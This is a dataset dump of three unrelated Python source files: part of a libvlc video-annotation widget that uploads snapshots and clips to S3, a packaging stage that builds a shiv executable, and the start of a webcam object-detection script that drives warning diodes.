l.debug('Process CPU %: {}'.format(p.cpu_percent()))\n l.debug('Process Threads: {}'.format(p.threads()))\n l.debug('Process Memory: {}'.format(p.memory_info()))\n l.debug('Process Memory %: {}'.format(p.memory_percent()))\n\n def load_set(self, set):\n self._current_set = set\n self._context_menu = ContextMenu(set, parent=self)\n self._context_menu.itemSelected.connect(self.onMenuSelect)\n\n def onMenuSelect(self, optDict):\n if optDict is not None:\n print(\"vlc_video_widget > onMenuSelect\")\n optDict['event_time'] = int(self.get_position())\n optDict['extent'] = self.get_highlight_extent().to_wkt()\n optDict['set'] = self._current_set\n diag = EventDialog(parent=self)\n diag.finished.connect(self.clear_extent)\n screen_center = QApplication.desktop().screenGeometry().center()\n x = screen_center.x() - diag.rect().center().x()\n y = screen_center.y() - 200\n getLogger('finprint').debug('Send dialog to {0}, {1}'.format(x, y))\n diag.move(x, y)\n diag.launch(optDict)\n else:\n self.clear_extent()\n\n # listen for any spacebar or mousedown event for play/pause\n def eventFilter(self, obj, evt):\n if evt.type() == QEvent.KeyPress and obj.__class__ != QLineEdit and QApplication.activeModalWidget() is None:\n if evt.key() == Qt.Key_Space:\n self.toggle_play()\n return True\n\n return False\n\n def load(self, file_name):\n self._file_name = file_name\n\n self.clear_extent()\n\n\n getLogger('finprint').info(\"Loading loading video {0}\".format(self._file_name))\n self.media = self.instance.media_new(self._file_name)\n self.mediaplayer.set_media(self.media)\n self.media.parse()\n\n # Where the magic starts - you have to give the handle of the QFrame (or similar object) to\n # vlc, different platforms have different functions for this. 
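# --- Illustrative sketch (not part of the original file) ---------------------
# The platform dispatch just below hands libvlc a native window handle
# (set_xwindow / set_hwnd / set_nsobject) so libvlc, not Qt, renders the video.
# A minimal standalone version of that wiring is sketched here. It assumes the
# PyPI `python-vlc` binding imported as `vlc` (the original bundles its own
# `vlc` module with the same API); `widget` stands for any Qt widget exposing
# winId(), and the helper names are ours, not part of the widget's API.

import sys
import vlc


def attach_player_to_widget(player, widget):
    """Give the widget's native window handle to libvlc for rendering."""
    win_id = int(widget.winId())
    if sys.platform.startswith("linux"):    # X11 window id
        player.set_xwindow(win_id)
    elif sys.platform == "win32":           # Windows HWND
        player.set_hwnd(win_id)
    elif sys.platform == "darwin":          # macOS NSView pointer
        player.set_nsobject(win_id)


def make_player(path):
    """Create an Instance/MediaPlayer pair and load one file, as load() does."""
    instance = vlc.Instance()
    player = instance.media_player_new()
    player.set_media(instance.media_new(path))
    return player
# -----------------------------------------------------------------------------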
Downside is its opaque to you,\n # libvlc is doing the rendering, so you are limited in what you can do with the widget - it\n # is an event black hole in Windows platforms\n if sys.platform.startswith('linux'): # for Linux using the X Server\n self.mediaplayer.set_xwindow(self.videoframe.winId())\n elif sys.platform == \"win32\": # for Windows\n self.mediaplayer.set_hwnd(self.videoframe.winId())\n elif sys.platform == \"darwin\": # for MacOS\n self.mediaplayer.set_nsobject(self.videoframe.winId())\n\n # don't start listening for spacebar until video is loaded and playable\n QCoreApplication.instance().installEventFilter(self)\n\n self._play_state = PlayState.Paused\n\n # wire up callbacks to VLC for snapshots and end of stream,\n # which is relative to the media being played\n mp_event_mgr = self.mediaplayer.event_manager()\n mp_event_mgr.event_attach(EventType.MediaPlayerSnapshotTaken, self.snapShotTaken)\n # XXX Uncomment these for debugging\n # mp_event_mgr.event_attach(EventType.MediaPlayerEndReached, self.streamEndEvent)\n # mp_event_mgr.event_attach(EventType.MediaPlayerPositionChanged, self.positionChangedEvent)\n # mp_event_mgr.event_attach(EventType.MediaPlayerTimeChanged, self.timeChangedEvent)\n\n # don't start listening for spacebar until video is loaded and playable\n self.mediaplayer.video_set_mouse_input(True)\n\n # if we have any special options, like hardware acceleration, that are media specific, set them here\n # XXX sohrt term hack here, we're only going to load these options if it is fullscreen\n opts = get_vlc_media_options()\n if opts and self._fullscreen :\n self.media.add_options(opts)\n\n self.show()\n # XXX hack to display the first few frames, which alters the bahavior of\n # VLC with respect to video scrubbing\n self.mediaplayer.set_time(20)\n print(\" playing for 20 msec\")\n self.mediaplayer.play()\n QTimer.singleShot(500, self.after_load)\n\n return True\n\n def after_load(self):\n self.mediaplayer.pause()\n self.clear_extent()\n self.annotationImage.clear()\n self.take_videoframe_snapshot()\n\n def _target_width(self):\n try:\n if not self._fullscreen:\n return VIDEO_WIDTH\n elif self.geometry().width() / self.geometry().height() > self._aspect_ratio:\n return self._target_height() * self._aspect_ratio\n else:\n return self.geometry().width()\n except ZeroDivisionError:\n return 0\n\n def _target_height(self):\n try:\n if not self._fullscreen:\n return self._target_width() / self._aspect_ratio\n elif self.geometry().width() / self.geometry().height() < self._aspect_ratio:\n return self._target_width() / self._aspect_ratio\n else:\n return self.geometry().height()\n except ZeroDivisionError:\n return 0\n\n # Reinstate last_progress here\n def on_timer(self):\n if self._play_state is not PlayState.EndOfStream:\n pos = self.mediaplayer.get_time()\n #intializing/updating timeVO to use as a common timer holder\n self.timer_vo.timer_duration_ms = pos\n if pos > (self.media.get_duration() - 2000):\n self.streamEndEvent()\n if self._play_state is PlayState.Playing and self._last_progress > PROGRESS_UPDATE_INTERVAL:\n self._last_progress = pos\n self.progressUpdate.emit(pos)\n self._onPositionChange(pos)\n\n def clear(self):\n print('vlc_video_widget > clear: get_position {0}'.format(self.get_position()))\n #self.pause()\n # TODO: clear/reset vlc media player\n self.mediaplayer.stop()\n self._timer.cancel()\n self.annotationImage.clear()\n self.removeWidget(self.annotationImage)\n self.annotationImage.hide()\n self.annotationImage = None\n self.annotationImage = 
AnnotationImage()\n self.addWidget(self.annotationImage)\n # set videoframe as default visibile widget\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n self.hide()\n self.update()\n\n\n def get_highlight_extent(self):\n ext = Extent()\n # The video may may have some padding in some cases when in fullscreen mode,\n # so use the _target_width() and _target_height() to determine the actual video size,\n # and offset the extent relative to any padding that may be there\n if self._fullscreen:\n # expected size of video\n actual_width = self._target_width()\n x_offset = (self.annotationImage.width() - actual_width)/2\n actual_height = self._target_height()\n y_offset = (self.annotationImage.height() - actual_height)/2\n annotation_rect = self.annotationImage.get_rect()\n annotation_rect.moveTo(annotation_rect.x() - x_offset, annotation_rect.y() - y_offset )\n ext.setRect(annotation_rect, actual_height, actual_width)\n else:\n ext.setRect(self.annotationImage.get_rect(), self.videoframe.height(), self.videoframe.width())\n return ext\n\n def get_highlight_as_list(self):\n r = self._highlighter.get_rect()\n return list(r.getCoords())\n\n def display_event(self, pos, extent):\n self.pause()\n self.annotationImage.clear()\n if self._fullscreen:\n # The video may may have some padding in some cases when in fullscreen mode,\n # so use the _target_width() and _target_height() to determine the actual video size,\n # and request an extent for that size. Once we have an extent, offset it to\n # account for any padding that may be there\n actual_width = self._target_width()\n x_offset = (self.annotationImage.width() - actual_width) / 2\n actual_height = self._target_height()\n y_offset = (self.annotationImage.height() - actual_height) / 2\n rect = extent.getRect(actual_height, actual_width)\n rect.moveTo(rect.x() + x_offset, rect.y() + y_offset)\n else:\n rect = extent.getRect(self.videoframe.height(), self.videoframe.width())\n self._observation_rect = rect\n self.scrub_position(pos)\n QTimer.singleShot(1000, self.display_observation_snaphot)\n\n def take_videoframe_snapshot(self):\n getLogger('finprint').info('take videoframe snapshot')\n self.annotationImage.clear()\n self.annotationImage.show()\n pix = QPixmap.grabWindow(self.videoframe.winId())\n snap = pix.scaledToHeight(self.videoframe.height())\n self.annotationImage.curr_image = snap.toImage()\n self.current_snapshot = snap.toImage()\n # XXX inline this function\n if self.is_filtered():\n self.refresh_frame()\n self.setCurrentIndex(ANNOTATION_INDEX)\n\n def display_observation_snaphot(self):\n self.take_videoframe_snapshot()\n if self._observation_rect is not None:\n getLogger('finprint').info('draw observation rect at {0}'.format(self._observation_rect))\n self.annotationImage.highlighter.start_rect(self._observation_rect.topLeft())\n self.annotationImage.highlighter.set_rect(self._observation_rect.bottomRight())\n self.annotationImage.repaint()\n\n def scrub_position(self, pos):\n # todo - just have a Seek State\n self.set_position(pos)\n print(\"vlc_video_widget > scrub_position \", pos)\n self.pause()\n\n def set_position(self, pos):\n self._onPositionChange(pos)\n p = (pos) / self.media.get_duration()\n getLogger('finprint').info('set_position {0}'.format(p))\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n self.mediaplayer.set_position(p)\n self.timer_vo.timer_duration_ms = pos\n\n\n def toggle_play(self):\n if self._play_state in [PlayState.Paused, PlayState.SeekForward, PlayState.SeekBack]:\n getLogger('finprint').info('toggle_play: play')\n 
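# --- Illustrative sketch (not part of the original file) ---------------------
# set_position() above maps a millisecond offset onto libvlc's 0.0-1.0 position
# scale by dividing by the media duration. The same conversion in isolation,
# with clamping added purely for illustration (the original does not clamp);
# the function name is ours, not part of the widget's API.

def ms_to_position_fraction(position_ms, duration_ms):
    """Map a millisecond offset to the 0.0-1.0 fraction libvlc expects."""
    if duration_ms <= 0:
        return 0.0
    return min(max(position_ms / duration_ms, 0.0), 1.0)


assert ms_to_position_fraction(30_000, 60_000) == 0.5
assert ms_to_position_fraction(90_000, 60_000) == 1.0   # clamped past the end
# -----------------------------------------------------------------------------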
self.play()\n else:\n getLogger('finprint').info('toggle_play: pause')\n self.pause()\n\n def play(self):\n # TODO emit if end of stream via callback\n\n self.show()\n self.clear_extent()\n self.set_speed(1.0)\n playStarted = self.mediaplayer.play()\n print('vlc_video_widget > play: play started? {0}'.format(playStarted))\n self._play_state = PlayState.Playing\n self._timer.start()\n self.playStateChanged.emit(self._play_state)\n\n def pause(self):\n if self.mediaplayer.is_playing():\n paused = self.mediaplayer.pause()\n getLogger('finprint').info('paused')\n self._play_state = PlayState.Paused\n self.playStateChanged.emit(self._play_state)\n self.playbackSpeedChanged.emit(0.0)\n self._timer.cancel()\n self.take_videoframe_snapshot()\n else :\n QTimer.singleShot(500, self.take_videoframe_snapshot)\n\n def save_image(self, filename):\n self.curr_s3_upload = filename\n curr_snapshot = os.path.basename(filename)\n snapshot_path_bytes = os.path.join(self.temp_snapshot_dir, curr_snapshot).encode('utf-8')\n # vlc calls need a C style string\n snapshot_path = ctypes.create_string_buffer(snapshot_path_bytes)\n # request actual decoded frame size from libvlc\n self.mediaplayer.video_take_snapshot(0, snapshot_path, 0, 0)\n\n def upload_image(self, filename, curr_image):\n getLogger('finprint').info('Uploading {0}'.format(filename))\n data = QByteArray()\n buffer = QBuffer(data)\n curr_image.save(buffer, 'PNG', SCREEN_CAPTURE_QUALITY)\n bio = BytesIO(data.data())\n bio.seek(0)\n try:\n conn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(AWS_BUCKET_NAME)\n if not bucket.get_key(filename):\n key = bucket.new_key(filename)\n key.set_contents_from_string(bio.read(), headers={'Content-Type': 'image/png'})\n key.set_acl('public-read')\n else:\n getLogger('finprint').error('File already exists on S3: {0}'.format(filename))\n except S3ResponseError as e:\n getLogger('finprint').error(str(e))\n\n def is_paused(self):\n return self._play_state == PlayState.Paused\n\n ''' Provides duration of current video play in milli seconds '''\n def get_position(self):\n return self.timer_vo.timer_duration_ms\n\n def get_length(self):\n duration = self.media.get_duration()\n if duration == -1:\n getLogger('finprint').exception(\"Failed to calculate length\")\n return 0\n else:\n return duration\n\n def fast_forward(self):\n self.set_speed(2.0)\n\n ## No worky.\n def rewind(self):\n if self._play_state == PlayState.SeekBack:\n self.mediaplayer.pause()\n else:\n self._play_state = PlayState.SeekBack\n self.clear_extent()\n self.playStateChanged.emit(self._play_state)\n\n def context_menu(self):\n if self._context_menu:\n if self._context_menu.display() is None :\n self._highlighter.clear()\n self.annotationImage.clearExtent()\n self.annotationImage.update()\n\n def is_filtered(self):\n return self.saturation > 0 or self.brightness > 0 or self.contrast\n\n def clear_extent(self):\n self.annotationImage.clearExtent()\n\n def set_speed(self, speed, start_playing=True):\n # XXX assume we are about to or are playing, so show videoframe\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n self.mediaplayer.set_rate(speed)\n\n # XXX Hack for set_positon\n if start_playing:\n self.playbackSpeedChanged.emit(speed)\n\n if PlayState.Paused and start_playing:\n self.mediaplayer.play()\n self._play_state = PlayState.Playing\n self.playStateChanged.emit(self._play_state)\n\n def resizeEvent(self, ev):\n self.update()\n\n def refresh_frame(self):\n self._refresh_frame_cv()\n\n def _refresh_frame_cv(self):\n if 
self._play_state is PlayState.Paused and self.current_snapshot :\n # grab a cv representation of the image\n # that has not been filtered\n curr_img = self.current_snapshot\n bgr = curr_img.rgbSwapped()\n cvFrame = self.qimage_to_numpy(bgr)\n filtered_img = self.filter_image(cvFrame)\n self.annotationImage.curr_image = filtered_img\n self.update()\n\n def filter_image(self, curr_img):\n frame = curr_img\n image = None\n try:\n getLogger('finprint').debug('saturation: {0} brightness: {1}'.format(self.saturation, self.brightness))\n # adjust brightness and saturation\n if (self.saturation > 0 or self.brightness > 0) and self._play_state == PlayState.Paused:\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n final_hsv = cv2.merge((\n h,\n np.where(255 - s < self.saturation, 255, s + self.saturation),\n np.where(255 - v < self.brightness, 255, v + self.brightness)\n ))\n frame = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n\n # equalize contrast\n if self.contrast is True and self._play_state == PlayState.Paused:\n lab = cv2.cvtColor(frame, cv2.COLOR_BGR2Lab)\n l_chan = cv2.extractChannel(lab, 0)\n l_chan = cv2.createCLAHE(clipLimit=2.0).apply(l_chan)\n cv2.insertChannel(l_chan, lab, 0)\n frame = cv2.cvtColor(lab, cv2.COLOR_Lab2BGR)\n\n height, width, channels = frame.shape\n image = QImage(frame, width, height, QImage.Format_RGB888)\n\n except Exception as ex:\n getLogger('finprint').exception('Exception building image: {}'.format(str(ex)))\n\n return image\n\n def qimage_to_numpy(self, curr_image):\n # make sure we have the smallest usable size\n curr_image = curr_image.convertToFormat(QImage.Format_RGB888)\n curr_image = curr_image.rgbSwapped()\n width = curr_image.width()\n height = curr_image.height()\n\n ptr = curr_image.bits()\n ptr.setsize(curr_image.byteCount())\n # XXX Make the # of channels (shape[2]) conditional, so if we\n # have an alpha or b/w it can be scaled accordingly\n frame = np.array(ptr).reshape(height, width, 3) # Copies the data\n\n return frame\n\n # callbacks start here\n # XXX TODO - add a video filter to libvlc to detect when video has been clicked,\n # so that it acts like the previous opencv-based version. This is likely a c based\n # video filter (plugin) for libvlc.\n def playerPausedEvent(self, event):\n # XXX remove\n getLogger('finprint').info('player paused event')\n\n # emit an event when at end of video.\n def streamEndEvent(self):\n getLogger('finprint').info('end of stream event')\n self._play_state = PlayState.EndOfStream\n self.playStateChanged.emit(self._play_state)\n dur = self.media.get_duration()\n self.mediaplayer.set_position((dur - 1000) / dur)\n print('vlc_video_widget > streamEndEvent: dur {0}, mediaplayer.get_position {1}'.format(dur, self.mediaplayer.get_position()))\n self.pause()\n self.playStateChanged.emit(self._play_state)\n\n # once a snaphsot is generated by vlc, post the snapshot (a decoded video frame)\n # in a background thread. 
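# --- Illustrative sketch (not part of the original file) ---------------------
# snapShotTaken() just below pushes the slow S3 upload onto a worker thread so
# the UI thread is not blocked. The same pattern in isolation, reusing the
# legacy boto (v2) calls already used by upload_image() above; the bucket
# name, key and credentials here are placeholders, not the project's values.

import threading
from boto.s3.connection import S3Connection


def upload_in_background(access_key, secret_key, bucket_name, key_name, payload):
    """Start a daemon thread that pushes `payload` (bytes) to S3."""
    def _worker():
        conn = S3Connection(access_key, secret_key)
        bucket = conn.get_bucket(bucket_name)
        if not bucket.get_key(key_name):          # skip if the key already exists
            key = bucket.new_key(key_name)
            key.set_contents_from_string(payload, headers={'Content-Type': 'image/png'})
            key.set_acl('public-read')

    thread = threading.Thread(target=_worker, daemon=True)
    thread.start()
    return thread
# -----------------------------------------------------------------------------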
It seems to be blocking on the main thread, even though\n # we should be running off of a C runtime thread\n def snapShotTaken(self, event):\n getLogger('finprint').info('process snaphot')\n # upload on a separate thread\n upload_thread = threading.Thread(target=self.process_snapshot)\n upload_thread.start()\n\n def process_snapshot(self):\n if self.curr_s3_upload is not None:\n s3_filename = os.path.basename(self.curr_s3_upload)\n getLogger('finprint').info('Searching for {0}'.format(s3_filename))\n expected_file = os.path.join(self.temp_snapshot_dir, s3_filename)\n if os.path.isfile(expected_file):\n getLogger('finprint').info('Found {0}'.format(expected_file))\n upload_img = QImage(expected_file)\n self.upload_image(self.curr_s3_upload, upload_img)\n self.curr_s3_upload = None\n print(\" expected_file \", expected_file)\n print(\" self.curr_s3_upload \", self.curr_s3_upload)\n print(\" s3_filename \", s3_filename)\n os.remove(expected_file)\n\n # callback for 'MediaPlayerPositionChanged'\n def positionChangedEvent(self, event):\n pos = self.mediaplayer.get_position()\n getLogger('finprint').info('Position changed: {0}'.format(pos))\n\n # callback for 'MediaPlayerTimeChanged'\n def timeChangedEvent(self, event):\n pos = self.mediaplayer.get_time()\n getLogger('finprint').info('Time changed: {0}'.format(pos))\n\n\n def generate_8sec_clip(self, filename) :\n if os.path.exists(self._file_name) :\n clip_path = self.generate_8sec_video_clip_wid_ffpmpeg(filename)\n else :\n getLogger('finprint').info('file path doesnt exist'.format(self._file_name))\n\n if filename is not None:\n s3_filename = os.path.basename(filename)\n getLogger('finprint').info('Searching for {0}'.format(s3_filename))\n expected_file = os.path.join(self.temp_snapshot_dir, s3_filename)\n if os.path.isfile(expected_file):\n getLogger('finprint').info('Found {0}'.format(expected_file))\n self.upload_8sec_clip(filename, clip_path)\n os.remove(clip_path)\n\n\n def upload_8sec_clip(self, filename, clip_path):\n getLogger('finprint').info('Uploading {0}'.format(filename))\n try:\n conn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(AWS_BUCKET_NAME)\n if not bucket.get_key(filename):\n key = bucket.new_key(filename)\n key.set_contents_from_filename(clip_path, headers={'Content-Type': 'video/mp4'})\n key.set_acl('public-read')\n print('File successfully uploaded on S3: {0}'.format(filename))\n getLogger('finprint').info('File successfully uploaded on S3: {0}'.format(filename))\n else:\n getLogger('finprint').error('File already exists on S3: {0}'.format(filename))\n except S3ResponseError as e:\n self.retry_count += 1\n getLogger('finprint').error(str(e))\n getLogger('finprint').error(\"Will retry in 20 sec......\")\n if self.retry_count == 1:\n time.sleep(10)\n print('***** retrying AWS upload again *****')\n self.upload_8sec_clip( filename, clip_path)\n else :\n getLogger('finprint').error(\"retry not working....\")\n msg = 'There was an error saving the video clip to the server. Retry by editing the observation or continue without creating a video clip.'\n QMessageBox.question(self.parent(), 'AWS UPLOAD ERROR', msg, QMessageBox.Close)\n except Exception as e:\n getLogger('finprint').error(str(e))\n self.retry_count += 1\n time.sleep(10)\n if self.retry_count == 1:\n print('***** retrying AWS upload again *****')\n self.upload_8sec_clip(filename, clip_path)\n else:\n getLogger('finprint').error(\"retry not working....\")\n msg = 'There was an error saving the video clip to the server. 
Retry by editing the observation or continue without creating a video clip.'\n QMessageBox.question(self.parent(), 'AWS UPLOAD ERROR', msg, QMessageBox.Close)\n\n self.retry_count = 0\n\n def generate_8sec_video_clip_wid_ffpmpeg(self, filename):\n try:\n curr_snapshot = os.path.basename(filename)\n clip_path = os.path.join(self.temp_snapshot_dir, curr_snapshot)\n if os.path.exists(clip_path):\n getLogger('finprint').info('removing duplicates video name from local disk {0}'.format(clip_path))\n try:\n os.remove(clip_path)\n except Exception :\n getLogger('finprint').info('not able to delete video name {0} from local disk '.format(clip_path))\n # vlc calls need a C style string\n t_start = self.get_position() / 1000\n if self.get_position() + 8000 > self.get_length():\n t_end = (self.get_length() - self.get_position()) / 1000\n else:\n t_end = 8\n ffmpeg_exe_path = \"ffmpeg_executable/ffmpeg.exe\"\n getLogger('finprint').info('ffpmge_exe_path {0}'.format(ffmpeg_exe_path))\n print(ffmpeg_exe_path)\n execute_command = ffmpeg_exe_path+' -i '+self._file_name+ ' -vf scale=800:-1 -c:v libx264 -ss '+ str(t_start) +' -c:a copy -t '+ \\\n str(t_end) +' -an '+clip_path\n subprocess.call(execute_command)\n except subprocess.CalledProcessError as e:\n self.retry_count += 1\n time.sleep(5)\n getLogger('finprint').error('subprocess exception in generating video clip {0}'.format(e))\n if self.retry_count == 1:\n print('***** retrying again *****')\n return self.generate_8sec_video_clip_wid_ffpmpeg(filename)\n else :\n msg = 'An error occurred while creating the video clip. Check your network connection and re-try by editing the observation or continue without creating a video.'\n QMessageBox.question(self.parent(), '8Sec Video Clip Error', msg, QMessageBox.Close)\n except Exception as e :\n self.retry_count += 1\n getLogger('finprint').error(' error in generating video clip {0}'.format(e))\n\n if self.retry_count == 1 :\n time.sleep(5)\n print('***** retrying again *****')\n return self.generate_8sec_video_clip_wid_ffpmpeg(filename)\n else :\n msg = 'An error occurred while creating the video clip. 
Check your network connection and re-try by editing the observation or continue without creating a video.'\n QMessageBox.question(self.parent(), '8Sec Video Clip Error', msg, QMessageBox.Close)\n\n self.retry_count = 0\n return clip_path","repo_name":"GlobalFinPrint/Finprint-Annotator","sub_path":"video_player/vlc_video_widget.py","file_name":"vlc_video_widget.py","file_ext":"py","file_size_in_byte":32462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74033364169","text":"import os\nimport os.path\nimport sys\nimport subprocess\n\nfrom typing import BinaryIO\nfrom subprocess import (\n check_output,\n CalledProcessError,\n)\nfrom tempfile import TemporaryDirectory\nfrom itertools import chain\nfrom contextlib import nullcontext\n\nimport tomli_w\n\nfrom vernac.stages.interface import (\n VernacStage,\n StageContext,\n StageAction,\n StageOutput,\n)\n\ndef generate_pyproject(file: BinaryIO, deps: list[str]):\n data = {\n \"build-system\": {\n \"requires\": [\"setuptools\", \"setuptools-scm\"],\n \"build-backend\": \"setuptools.build_meta\"\n },\n \"project\": {\n \"name\": \"vnprog\",\n \"requires-python\": \">=3.10\",\n \"dependencies\": deps,\n \"version\": \"0.0.1\",\n \"scripts\": {\n \"main\": \"vnprog.main:main\"\n },\n },\n }\n\n tomli_w.dump(data, file)\n\ndef package_in_dir(py_files: dict[str, str], dir_path: str, deps: list[str]):\n def to_dir(*rel_paths: str) -> str:\n return os.path.join(dir_path, *rel_paths)\n\n os.makedirs(to_dir(\"src/vnprog\"), exist_ok=True)\n\n for (filename, python) in py_files.items():\n py_path = to_dir(\"src/vnprog\", filename)\n\n with open(py_path, \"wt\") as file:\n file.write(python)\n\n with open(to_dir(\"pyproject.toml\"), \"wb\") as file:\n generate_pyproject(file, deps)\n\ndef shiv_package(dir_path: str, out_path: str):\n # crudely guess the shiv bin location\n python_dir = os.path.dirname(sys.executable)\n shiv_path = os.path.join(python_dir, \"shiv\")\n\n # run shiv to package\n try:\n check_output(\n [\n shiv_path,\n \"-o\", out_path,\n \"-c\", \"main\",\n dir_path,\n ],\n stderr=subprocess.STDOUT,\n )\n except CalledProcessError as error:\n print(error.output)\n\n raise\n\nclass PackageStage(VernacStage):\n steps = 2\n\n def __init__(\n self,\n title: str,\n out_path: str,\n package_dir: str | None = None,\n ):\n self.title = title\n self.out_path = out_path\n self.package_dir = package_dir\n\n def run(\n self,\n context: StageContext,\n python: str,\n dependencies: list[str],\n modules: dict[str, dict],\n ) -> StageOutput:\n py_files = {\"main.py\": python}\n\n for module in modules.values():\n py_files[module[\"py_name\"]] = module[\"python\"]\n\n module_deps = chain.from_iterable(\n m[\"dependencies\"] for m in modules.values()\n )\n\n if self.package_dir is None:\n tmpdir_context = TemporaryDirectory(prefix=\"vernac-\")\n else:\n tmpdir_context = nullcontext(\n os.path.abspath(self.package_dir),\n )\n\n with tmpdir_context as tmpdir:\n package_in_dir(\n py_files=py_files,\n dir_path=tmpdir,\n deps=dependencies + list(module_deps),\n )\n\n context.advance_progress()\n\n shiv_package(dir_path=tmpdir, out_path=self.out_path)\n\n context.advance_progress()\n\n return StageOutput(\n action=StageAction.NEXT,\n state=dict(out_path=self.out_path),\n 
)\n","repo_name":"bsilverthorn/vernac","sub_path":"src/vernac/stages/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"16994403188","text":"from imutils.video import VideoStream\nfrom imutils.video import FPS\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\n\n\n# example run args\n# -p model/model_deploy.prototxt.txt -m model/model_deploy.caffemodel -w 600 -d True\n\nIDX_CONFIG_ALL = [2,6,7,14,15]\nIDX_CONFIG_VEHICLES = [2,6,7,14]\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--prototxt\", required=True,\n help=\"path to Caffe 'deploy' prototxt file\")\nap.add_argument(\"-m\", \"--model\", required=True,\n help=\"path to Caffe pre-trained model\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.2,\n help=\"minimum probability to filter out unreliable detections\")\nap.add_argument(\"-w\", \"--width\", type=int, default=600,\n help=\"max width of screen to grab\")\nap.add_argument(\"-d\", \"--debug\", type=bool, default=False,\n help=\"show the screen being grabbed, imshow\")\nap.add_argument(\"-i\", \"--idxconfig\", type=str, default='IDX_CONFIG_ALL',\n help=\"choose the IDX_CONFIG to use IDX_CONFIG_ALL for vehicles + person or IDX_CONFIG_VEHICLES for only vehicles\")\n\nargs = vars(ap.parse_args())\n\nif args[\"idxconfig\"] == 'IDX_CONFIG_ALL':\n IDX_CONFIG = IDX_CONFIG_ALL\nelse:\n IDX_CONFIG = IDX_CONFIG_VEHICLES\n\nNUM_DIODES = 8\n\n# initialize the list of class labels MobileNet SSD was trained on\nCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"]\n\n# opencv color space BGR - bounding box colors for debugging\nCOLORS = {2: (255,255,0), # bicycle - lightblue\n 6: (0,128,255), # orange - bus\n 7: (0,0,255), # red - car\n 14: (0,255,255), # yellow - motorbike\n 15: (0,255,0) # green' - person\n }\n\n\n\n# idx = class_label\n # 2 = bicycle\n # 6 = bus\n # 7 = car\n # 14 = motorbike\n # 15 = person\n\n\n# load model from file\nprint(\"loading model...\")\nnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\n\n\ndef vid_stream():\n # start video\n print(\"starting video...\")\n stream = VideoStream(src=0).start()\n # give time to grab a frame\n time.sleep(2.0)\n fps = FPS().start()\n while (True):\n # max width of 600 pixel for video in\n f = stream.read()\n f = imutils.resize(f, width=args[\"width\"])\n\n (h, w) = f.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(f, (300, 300)),\n 0.007843, (300, 300), 127.5)\n\n # pass blob to nn\n net.setInput(blob)\n detections = net.forward()\n\n # loop over the detections\n for i in np.arange(0, detections.shape[2]):\n # extract the confidence (probability) of nn:s prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections (unlikely)\n if confidence > args[\"confidence\"]:\n # extract the index of the class label\n # (x, y)-coordinates of the bounding box for the object\n idx = int(detections[0, 0, i, 1])\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n\n # how wide is classified object\n obj_width = endX - 
startX\n obj_height = endY - startY\n\n #if classified object is interesting\n # if idx == 2 or idx == 6 or idx == 7 or idx == 14 or idx==15:\n if idx in IDX_CONFIG:\n # draw the prediction on the streams cur_frame\n draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n\n if obj_width >= 1/4 * w:\n activate_diodes(startX, endX, w, idx)\n draw_warning(f)\n\n # show the output frame\n if args[\"debug\"]:\n cv2.imshow(\"Output Frame\", f)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n # update the FPS counter\n fps.update()\n fps.stop()\n # print(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\n\n # do a bit of cleanup\n cv2.destroyAllWindows()\n stream.stop()\n\n\ndef draw_warning(f):\n # draws warning on cv screen\n cv2.putText(f, 'WARNING!!!', (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 3)\n\n\ndef draw_prediction(confidence, endX, endY, f, idx, startX, startY):\n # draw the prediction on the streams cur_frame\n label = \"{}: {:.2f}%\".format(CLASSES[idx],\n confidence * 100)\n cv2.rectangle(f, (startX, startY), (endX, endY),\n COLORS[idx], 2)\n y = startY - 15 if startY - 15 > 15 else startY + 15\n cv2.putText(f, label, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n\n\ndef get_color_for_class(idx):\n # Define colors which will be used by the example. Each color is an unsigned\n # 32-bit value where the lower 24 bits define the red, green, blue data (each\n # being 8 bits long).\n # DOT_COLORS = [0x200000, # red\n # 0x201000, # orange\n # 0x202000, # yellow\n # 0x002000, # green\n # 0x002020, # lightblue #\n # 0x000020, # blue\n # 0x100010, # purple\n # 0x200010] # pink\n\n # 2 = bicycle\n # 6 = bus\n # 7 = car\n # 14 = motorbike\n # 15 = person\n color_id_dict = {2: '0x002020', #bicycle - lightblue\n 6: '0x201000', #orange - bus\n 7: '0x200000', #red - car\n 14:'0x202000', #yellow - motorbike\n 15: '0x002000' # green' - person\n }\n\n return color_id_dict[idx]\n\n\ndef activate_diodes(startX, endX, w, idx):\n # pass 22 tuples,\n # (id, color(32 byte rgb))\n\n\n\n # Brightness 0-255\n brightness = 255\n\n width_per_diode = w/NUM_DIODES\n start_id = startX/width_per_diode\n end_id = 